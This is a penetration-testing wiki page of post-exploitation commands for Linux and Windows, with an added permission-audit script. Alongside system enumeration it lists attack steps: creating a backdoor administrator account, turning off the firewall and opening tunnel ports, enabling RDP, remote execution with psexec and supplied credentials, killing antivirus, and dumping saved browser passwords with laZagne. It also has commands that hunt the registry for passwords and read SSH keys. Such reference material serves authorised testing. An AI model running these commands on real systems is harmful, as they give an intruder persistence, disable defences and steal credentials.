Post exploitation

From pentestwiki.org

Linux

  • Check wrong permissions:

Find setuid binaries:

$find / -perm -4000 -ls 2> /dev/null


Find files world writable:

$find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null


Find directories world writable:

$find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2> /dev/null
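An added example (not from pentestwiki.org) that packages the three checks above into one audit script. The extra step it shows is separating world-writable directories that carry the sticky bit (like /tmp, normally expected) from those without it, which are the real findings; it also picks up setgid binaries. The search root is a parameter, so it can be pointed at a single mount or at a test tree.

```shell
#!/bin/sh
# Permission audit (added example, not from the original page).
# Usage: . ./audit.sh; audit_perms [root]   (root defaults to /)
# -xdev keeps find on one filesystem, so /proc, /sys and network mounts are skipped
# when the root is /; use the page's -prune form instead if you need to cross mounts.

setuid_setgid_files() {
  find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

world_writable_files() {
  find "$1" -xdev -type f -perm -o=w 2>/dev/null
}

# World-writable directories WITHOUT the sticky bit: any user can delete or
# rename other users' files there, so these are the ones worth reporting.
ww_dirs_no_sticky() {
  find "$1" -xdev -type d -perm -o=w ! -perm -1000 2>/dev/null
}

# World-writable directories WITH the sticky bit (mode 1777), e.g. /tmp:
# usually expected and only interesting if an unexpected path shows up.
ww_dirs_sticky() {
  find "$1" -xdev -type d -perm -o=w -perm -1000 2>/dev/null
}

audit_perms() {
  root="${1:-/}"
  echo "== setuid/setgid files under $root"
  setuid_setgid_files "$root"
  echo "== world-writable files"
  world_writable_files "$root"
  echo "== world-writable directories WITHOUT sticky bit (findings)"
  ww_dirs_no_sticky "$root"
  echo "== world-writable directories with sticky bit (usually expected)"
  ww_dirs_sticky "$root"
}
```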


  • Look for interesting files:
$find / -name "*.txt" -ls 2> /dev/null
$find / -name "*.log" -ls 2> /dev/null


  • Check sudo:
$sudo su
$sudo -l


  • Inspect (and decrypt) a PKCS#12 file:
$openssl pkcs12 -info -in $FILE


  • Show certs in PKCS#7 file:
$openssl pkcs7 -print_certs -inform DER -in $FILE
$openssl smime -verify -in signed.p7 -inform [pem|der]


Show keystore content:

$keytool -list -v -keystore keystore.jks


  • Commands for information gathering:
$ps -ef


$mount


$/sbin/ifconfig -a


$route -n


$cat /etc/crontab
$ls -la /var/spool/cron*/
$ls -la /etc/cron.d


$cat /etc/exports


$cat /etc/redhat* /etc/debian* /etc/*release


$netstat -tanu


Find users whose login shell is sh or bash:

$grep -E '/bin/(ba)?sh$' /etc/passwd


Check bootup services:

$ls /etc/rc*


SSH relationships and logins:

$cat ~/.ssh/*


References:

Tools:

Windows

Check filesystem:

Like "ls -la" in Linux:

C:>dir /A:H


C:>dir /s /b C:\ | findstr /E ".txt" > txt.txt
C:>dir /s /b C:\ | findstr /E ".log" > log.txt
C:>dir /s /b C:\ | findstr /E ".doc" > doc.txt
C:>dir /s /b C:\ | findstr /E ".xls" > xls.txt
C:>dir /s /b C:\ | findstr /E ".xml" > xml.txt


Check registry:

C:>reg query HKLM /f password /t REG_SZ /s > hklm_password.txt
C:>reg query HKCU /f password /t REG_SZ /s > hkcu_password.txt
C:>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated > reg_always.txt
C:>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated >> reg_always.txt


Check scheduler:

C:>schtasks /query /fo LIST /v > schtasks.txt
C:>tasklist /SVC > tasklist.txt


Other checks (the wmic line reboots the host, so it is not a read-only check):

C:>DRIVERQUERY
C:>wmic os where Primary='TRUE' call reboot


List hotfixes:

C:>wmic qfe


Open an NTFS alternate data stream (file:stream) in notepad:

C:>notepad myfile.txt:lion.txt

Miscellaneous checks:

C:>eventvwr.exe
C:>quser > rdp.txt
C:>netstat -an > netstat.txt
C:>netsh firewall show config > firewall.txt
C:>icacls service.exe
C:>type C:\Windows\System32\drivers\etc\hosts


Wmic commands:

C:>wmic service get name,displayname,pathname,startmode > wmic_service.txt
C:>wmic /node:"<host>" qfe GET description,FixComments,hotfixid,installedby,installedon,servicepackineffect
C:>wmic /node:"<host>" product get name,version,vendor
C:>wmic process get Caption,CommandLine
C:>wmic printer list status
C:>wmic cpu get

List SIDs of the system (as admin):

C:>wmic useraccount get name,sid,fullname


Net commands:

C:>net view
C:>net view \\host
C:>net share
C:>net use z: \\host\dir
C:>net users
C:>net user %username%
C:>net config rdr


Backdoor account:

C:>net user hax0r hax0r /add
C:>net localgroup administrators hax0r /add
C:>net localgroup "Remote Desktop users" hax0r /add


Check routing/network information:

C:>route print
C:>arp -a
C:>ipconfig /all
C:>getmac


Show file attributes / permissions:

C:>cacls cmd.exe
C:>attrib cmd.exe


List services:

C:>sc queryex type= service state= all


List started services, plus basic system and user information:

C:>net start
C:>systeminfo
C:>whoami


Same on Windows XP (no whoami binary by default):

C:>echo %USERNAME%


  • Firewall
C:>netsh firewall show state
C:>netsh firewall show config
C:>netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
C:>netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
C:>netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
C:>netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079


Disable firewall:

C:>netsh advfirewall set currentprofile state off


C:>netsh advfirewall set allprofiles state off


  • RDP

Show RDP sessions:

C:>quser


C:>qwinsta
C:>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
msf>reg queryval -k "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" -v TSEnabled
msf>reg setval -k "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" -v TSEnabled -d 1
C:>netsh firewall set service type = remotedesktop mode = enable
C:>net start termservice
C:>net start "Terminal Services"
(svchost.exe -k termsvcs is the service-host command line TermService runs under, as it appears in tasklist /svc; it is not meant to be typed by hand.)
C:>tasklist /svc /S servername /U username /P password


Change RDP port:

HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp, value PortNumber (REG_DWORD, default 3389)


Remote Execution

C:>wmis -U DOMAIN\<USER>%<PASS> //<DC> cmd.exe /c <COMMAND>
C:>wmic /node:$IP /user:administrator /password:mypassword bios get serialnumber
C:>tasklist.exe /S $IP /U domain\username
C:>tasklist.exe /S $IP /U domain\username /FI "USERNAME eq NT AUTHORITY\SYSTEM" /FI "STATUS eq running"
C:>taskkill.exe /S $IP /U domain\username /F /FI "norton"
C:>quser /SERVER:$IP


From sysinternals psexec:

C:>psexec -accepteula \\$IP -u DOMAIN\USER cmd.exe
C:>psexec \\$IP -s cmd /c copy \\server\share\file.ext c:\Temp
C:>psexec -s \\$IP c:\windows\system32\cscript.exe script.vbs arg1

Copy a file to the target host AND execute it:

C:>psexec -accepteula \\$IP -u DOMAIN\USER -c file.exe -w C:\temp



Authenticated WMI Exec via Powershell

msf > use exploit/windows/local/ps_wmi_exec
msf exploit(windows/local/ps_wmi_exec) > show options

Module options (exploit/windows/local/ps_wmi_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DOMAIN                     no        Domain or machine name
   PASSWORD                   no        Password to authenticate with
   RHOSTS                     no        Target address range or CIDR identifier
   SESSION                    yes       The session to run this module on.
   USERNAME                   no        Username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Universal


msf exploit(windows/local/ps_wmi_exec) >


  • In the same host but with other role:
C:>runas /user:administrator cmd
C:>runas /noprofile /user:DOMAIN\administrator cmd
C:>runas /profile /env /user:DOMAIN\<USER> "%windir%\system32\script.bat"




  • Windows exploit suggester / Windows-Exploit-Suggester (OBSOLETE)

WARNING: As of March 14 2017 no longer supported (https://github.com/GDSSecurity/Windows-Exploit-Suggester/issues/28)

$python windows-exploit-suggester.py --update
$python windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt


Tools for information gathering

  • Manual method
C:>dir %TMP% %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent
C:>dir %USERPROFILE%\Favorites
C:>type C:\Windows\System32\drivers\etc\hosts



C:>laZagne.exe all


C:>laZagne.exe browsers


C:>laZagne.exe browsers -firefox